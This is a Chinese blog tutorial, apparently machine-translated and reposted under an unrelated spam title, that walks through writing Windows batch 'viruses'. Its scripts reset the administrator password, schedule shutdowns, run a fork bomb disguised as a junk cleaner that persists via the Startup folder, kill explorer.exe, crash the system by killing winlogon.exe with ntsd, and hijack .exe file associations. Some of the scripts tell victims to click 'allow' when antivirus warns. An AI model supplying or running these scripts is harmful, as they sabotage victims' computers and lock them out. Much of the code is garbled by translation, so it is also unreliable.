csdn密码(csdn账号购买)

【编者按】病毒这个不速之客，让人脸色苍白。这就好比一个黑衣人躲在斗篷人下面，被“光顾”的人会倒霉。本文是作者网络安全自学教程系列之一，将讲解病毒原理的简单知识，批量代码制作病毒，包括自动启动、修改密码、定时关机、蓝屏、进程关闭等功能。希望这篇基础文章对你有所帮助，也希望你能提高自己的安全意识，学会如何做好防范措施，欢迎大家讨论。

作者|杨

编辑|彦希

本文授权转载自CSDN博客专家Eastmount。

声明:我坚决反对利用教学方法实施犯罪，一切犯罪行为都将受到严惩。绿色电网需要我们共同维护它们，我们建议您了解它们背后的原理，并更好地保护它们。

1.关闭bat脚本

计算机病毒是由编译器插入到计算机程序中的一组计算机指令或程序代码，用于破坏计算机功能或数据，影响计算机的使用，并进行自我复制。计算机具有传染性、隐蔽性、传染性、潜伏性、兴奋性、表现性或破坏性。

计算机的生命周期:发展→感染→潜伏→攻击→发现→消化→灭绝。计算机是一个程序，一个可执行的代码。就像生物病毒一样，具有自我复制、相互感染、激活和再生的特性。计算机有独特的复制能力。它们可以迅速传播，并且通常难以根除。它们可以将自己附加到各种类型的文件上，当文件从一个用户复制或传输到另一个用户时，它们会随着文件一起传播。

下面是第一个批处理脚本，主要调用“shutdown”来关闭。基本步骤如下:

新建文本文档

进入关闭-s -t 600。

将txt改为bat

如下图所示，通过运行CMD可以看到shutdown命令的基本用法。

基本命令是:

1关机-s -t 600
2//现在让系统在600秒后关机
3
4关机-a
5//终止电脑关机
运行结果如下图所示:

新建一个“test.bat”，填写“shutdown -s -t 600”。有些系统需要在“文件夹选项”中显示“隐藏已知文件类型的扩展名”。

双击BAT文件运行关机。如果需要取消，请在CMD黑框中输入“shutdown -a”命令。

二.修改密码和定时关机病毒二。更改密码和定期关闭病毒

接下来，我们来分享一个比较完整的病毒制作过程。

第一步是创建一个新的game.bat文件。

程序编写如下，其中“@echo off”表示关闭回声，“color 0a”表示设置颜色。

1 @ echo off
2 color 0a
3 title east mount程序
4
5 CHO = = = = = = = = = = = = = = = = = = = = = = = = = = = 8 echo 2。定时关机
9echo 3。退出此程序
10 ECHO = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
11

第二步，做选择判断。程序需要与用户互动。

核心代码是“set /p num= your choice is:“”，意思是设置变量num，“/p”意思是暂停等待用户输入，用户最后输入的值赋给num。

1 @ echo off
2 color 0a
3 title east mount程序
4
5 CHO = = = = = = = = = = = = = = = = = = = = = = = = = = = 8 echo 2。定时关机
9echo 3。退出此程序
10 ECHO = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
11

第三步，补充修改管理员密码，定时关机，退出等命令。

修改管理员密码的命令是所有Microsoft系统的通用命令。下面的代码是将当前的管理员密码修改为“123456”。

1 net user administrator 123456

第二个选项是关机，命令如下：1 net user administrator 123456
第二个选项是shutdown，命令如下:

1 shutdown -s -t 100
第三个选项是退出该程序。

1退出
然后把判断和跳转批次代码写成如下，“>:Nul”表示不输出操作提示信息。

1 @ echo off
2 color 0a
3 title east mount程序
4
5:菜单
6 echo = = = = = = = = = = = = = = = = = = = = = 8 echo 1。修改管理员密码
9echo 2。定时关机
10echo 3。退出此程序
11 ECHO = = = = = = = = = = = = = = = = = = = = = = = = = 14 if " % num % " = = " 1 " goto 1
15 if " % num % " = = " 2 " goto 2
16 if " % num % " = = " 3 " goto 3
17
18:1
19 net用户管理员123456 & gtNul
20echo您的密码已经设置成功！
21暂停
22转到菜单
23
24: 2
25关机-s-t100
26转到菜单
27
。

同时，杀毒软件会提示黑客修改电脑，只需点击“允许操作”即可。

然后添加“cls”命令来清除屏幕。同时为了避免输入数字“4”会被从头到尾执行，增加了提示信息。代码修改如下:

1 @ echo off
2 color 0a
3 title east mount程序
4
5:menu
6 cls
7 CHO = = = = = = = = = = = = = 9 echo 1。修改管理员密码
10echo 2。在固定时间关机
11echo 3。退出此程序
12 ECHO = = = = = = = = = = = = = = = = = = = = = = = = 1 if " % num % " = = " 1 " goto 1
16 if " % num % " = = " 2 " goto 2
17 if " % num % " = = " 3 " goto 3
18
。输入1-3个正确的数字
20 pause
21 goto menu
22
23:1
24 net user administrator 123456 >:Nul
25 echo您的密码已成功设置！
26暂停
27转到菜单
28
29: 2
30关机-s-t100
31转到菜单
32
。

继续修改代码，补充设置用户名和新密码，关机时间等。

1 @ echo off
2 color 0a
3 title east mount程序
4
5:menu
6 cls
7 CHO = = = = = = = = = = = = = 9 echo 1。修改管理员密码
10echo 2。在固定时间关机
11echo 3。退出此程序
12 ECHO = = = = = = = = = = = = = = = = = = = = = = = = 1 if " % num % " = = " 1 " goto 1
16 if " % num % " = = " 2 " goto 2
17 if " % num % " = = " 3 " goto 3
18
。请输入1-3个正确的数字
20暂停
21转到菜单
22
23:1
24 set/p u =请输入用户名:
25 set/p p =请输入新密码:Nul
27echo您的密码已成功设置！
28 pause
29 goto menu
30
31:2
32 set/p time =请输入时间:
33 shut down-s-t % time %

2输入可以设置关机时间，这里不再赘述。第一部分已经详细解释了。

三。自启动崩溃病毒

然后写一段伪装成“系统垃圾清理”的代码，其实就是导致系统崩溃的代码。不能算是“病毒”，更多的是恶作剧程序。原理是不断打开CMD程序，占用系统资源导致死机，每次开机都会自动启动。

PS:这里强调一下，建议你在虚拟机中运行这段代码。作为安全工程师，我们希望您能够理解漏洞背后的原理，并更好地防御它。绿色电网需要我们共同维护，杜绝一切违法行为。

第一步是在C:\windows目录中创建文件“windows.bat”。一个">"覆盖文件内容，两个" >:>在文件末尾附加一个句子。

1echo start cmd & gtc:\ windows \ windows . bat
2 echo % 0 & gt；& gtC:\windows\windows.bat
用户打开这个程序后，程序会一直打开cmd，占用系统资源，导致系统瘫痪。%0表示再次执行该程序。但是，这只能让用户崩溃一次。系统重启后，文件不再打开后就不会再被抓到了。

第二步，将这个恶意脚本放到启动菜单中，每次启动时，它都会自动开始运行并导致电脑崩溃。

Errorlevel是一个预定义的变量，它随着系统的变化而变化。如果为0，则最后一个命令执行成功；如果不为0，则最后一个命令失败；不是Win7系统，但是执行下面这个命令(XP系统，2003系统)。

代号“回声”表示空行，例如代码:

输出如下图所示:

第三步，写下一个区号。完整的代码如下所示。

1@echo off
2title系统垃圾清理
3color2f
4cho = = = =如果有杀毒软件恶意拦截，请选择[允许程序的所有操作] = = =
5cho。
6cho。[/br c:\ windows \ windows . bat
9::echo % % 0 & gt；& gtc:\ Windows \ Windows . bat
10
11 copy c:\ Windows \ Windows . bat " % user profile % \ AppData \ Roaming \ Microsoft \ Windows \开始菜单\程序\启动\ " & gtnul
12IF % error level % = = 0 gotonext
13
14 copy C:\ windows \ windows . bat " % user profile % \开始菜单\程序\开始\ " >；nul
15if % error level % = = 1 goto error
16
17:next
18 echo。
19回声。
20echo = = = =垃圾清理，请Nul
23 echo。
24 echo = = = =垃圾清理完毕，共500m = = = = = = = = =
25 echo。
26回声。
27回显= = = =建议立即重启电脑= = = = = = = = = =
28暂停
= = = = = = = = =
34回显。
35暂停
注意我注释了重复的操作码"::echo % % 0 >；& gtC:\windows\windows.bat”，否则开机启动会很麻烦。然后运行代码，如下图所示。您需要右键单击“以管理员身份运行”。

该代码将在C:\windwos目录中创建批处理文件“windows.bat”。

同时这个文件也在我的Win10系统启动自动目录下。

目录:…\ AppData \ Roaming \ Microsoft \ Windows \开始菜单\程序\启动\

当你打开这个文件的时候，你可以看到写好的“start CMD”代码，表示CMD已经打开。

双击“windows.bat”文件，运行结果如下图所示。

总结:本文写过一个系统清理工具，实际上就是把这个windows.bat写入用户的开机目录，这样用户每次开机都会运行程序，反复调用CMD会占用资源。如果感染了病毒，用户可以使用PE打开引导目录删除windows.bat文件，或者重装系统。还是那句话，我建议你不要让它反复跑。

四。进程关闭病毒

再看另一个伪装垃圾清理的批处理代码。命令是杀死进程，“/im explorer.exe”表示要杀死的进程名称，关闭桌面；“/f”表示强行杀戮；" & gtNul”表示不在屏幕上输出任何信息。

1 task kill/im explorer.exe/f & gt；nul 2 & gtnul
的完整代码如下图，其中“Start c:\windows\expolrer.exe”表示继续打开桌面，“ping-n5 127.0.0.1 >: Nul”用于消耗时间。

1@echo off
2title系统垃圾清理
3color2f
4cho = = = =如果有杀毒软件恶意拦截，请选择[允许程序的所有操作] = = =
5cho。
6cho。[/br请不要关闭窗口= = = = = = = = =
9 echo。
10 ping-n5 127 . 0 . 0 . 1 >:nul
11 task kill/im explorer.exe/f & gt；nul 2 & gtNul
12回声。
13 echo = = = =转了，你的系统报废了= = = = = =
14 echo。
15平-n5 127 . 0 . 0 . 1 >；回0。
17 start C:\ windows \ explorer.exe
18 echo。
19Echo = = = =已修复！你害怕吗？！o(∩_∩)o = = = = = = = =
20 pause
运行这个批处理程序，桌面就会消失，如下图所示。

过一会儿，桌面就恢复了。因为作者的桌面太乱，这里只显示壁纸显示。

五.最简单的蓝屏炸弹文件5.最简单的蓝屏炸弹文件

新建文本文档

输入:ntsd-c q-pn winlogon.exe来强制终止该进程。

工具->:文件夹选项->；检查-& gt；选中“隐藏已知文件类型的扩展名”

Txt改成bat。

Go->:程序->:开始，打开game.bat文件

黑客很少攻击个人，一般攻击服务器。这个命令对2003年的服务器尤其致命。

双击后，服务器直接显示在蓝屏上，重启。

从Windows 2000开始，Ntsd就是系统自己的进程调试工具，它位于system32目录中。Ntsd功能非常强大，使用起来也很复杂，但是如果只是用来结束一些进程的话，会简单一些。只有系统，SMSS.EXE和CSRSS.EXE不能在Windows中被杀死。前两个是纯内核态，最后一个是Win32子系统，这是ntsd本身需要的。也不要杀lsass.exe，它负责本地账户的安全。调试器附加的进程将随调试器一起退出，因此它可用于在命令行终止进程。

打开cmd并输入以下命令结束该过程:

方法1:使用进程的PID结束进程。

命令格式:ntsd -c q -p pid

例如:ntsd -c q -p 1332(结束explorer.exe进程)

例:explorer.exe的pid是1332，但是如何获取进程的pid呢？在CMD下输入TASKLIST，获取当前任务管理器中所有进程的PID。或者打开任务管理器，在菜单栏中选择“视图”->:选择列，在打开的选项窗口中勾选PID(进程标识符)项，这样任务管理器的进程中就会多一个PID项。PID的分配不是固定的，而是在进程启动时由系统随机分配，所以每次启动的进程一般都不一样。

方法2:使用进程名结束进程。

命令格式:ntsd-c q-pn xxxx.exe(xxxx.exe是进程名，exe不能保存)

例如:ntsd-c q-pn explorer.exe

其他可以结束进程的DOS命令包括taskkill和tskill命令。

不及物动词最简单的扩展病毒

修改文件格式或加密文档是常见的病毒，如永恒之蓝、勒索病毒等。他们把电脑里所有的资料和文件都加密了。当你想打开一个文件时，你需要一个密码。这时候你通过比特币支付进行勒索。

下面这个小操作就是把exe文件修改成txt文件。遇到可执行的exe文件，会以为是txt文档，会用记事本打开，导致可执行程序无法运行。这就是这种病毒的原理。

新建文本文档

添加的代码:assoc.exe=txtfile

工具->:文件夹选项->；检查-& gt；选中“隐藏已知文件类型的扩展名”

Txt改成bat。

Go->:程序->:开始，打开bat文件

双击bat文件后，我们的可执行文件就变成了txt文件。此时系统认为exe是txt程序，混淆了系统的关联，恢复起来很麻烦。

EXE程序打开，如下图所示。

即使打开CMD也是TXT文本文件。

然后，您需要执行以下命令来恢复exe文件。

assoc.exe=exefile

恢复后的代码和效果如下图所示。

所有其他文件格式都转换为txt文件，如下所示。这时候如果隐藏文件扩展名，甚至可以修改图标伪装成目标应用，用户点击就会销毁；但是，因为我们不知道目标是否有隐藏的文件扩展名，所以仍然不推荐这种“愚蠢”的方法。

1assoc.htm = txt file
2 assoc . dat = txt file
3assoc.com = txt file
4assoc.rar = txt file
5 assoc . gho = txt file
6 assoc

如果不幸感染了病毒，该如何解决？如下图所示，恢复所有正确的关联即可。

PS:也有一些病毒，如VBS脚本，网页弹出(钓鱼)等。，这里就不解释了。推荐读者阅读之前的文章《【网络安全自学】XXV》。《网络安全与木马、病毒及防御》学习路线初探。如果把病毒程序放在启动项里，每次启动都会自动执行。

七.总结七。摘要

希望这一系列文章对你有所帮助。真的觉得自己厨艺不错，有很多知识要学。这是第44期原创安全系列，从网络安全到系统安全，从木马病毒到后门劫持，从恶意代码到溯源分析，从渗透工具到二进制工具，还有Python安全，峰会论文，黑客大赛，漏洞分享。懂得如何防御未知，人生路漫漫其修远兮。作为一个初学者，我真的是在匍匐前进。感谢很多人的帮助，继续爬，继续加油！

欢迎讨论，你觉得这一系列文章对你有帮助吗？有什么建议可以评论分享给读者。

侠客伟大，报效国家，报效人民。向一线医护人员、军人、工人、科学家和所有工作者致敬。我们中国人的人生最高追求，就是为天地立心，为百姓立命，为前事不忘，为天下太平。他们真的做到了。人生没有平静的岁月，但这些人为我们负重前行。希望大家健康平安，戴口罩不出门，勤洗手，多吃饭。加油，中国湖北武汉。团结就是力量，加油必胜！！！

原始链接:

https://blog.csdn.net/Eastmount/article/details/104146757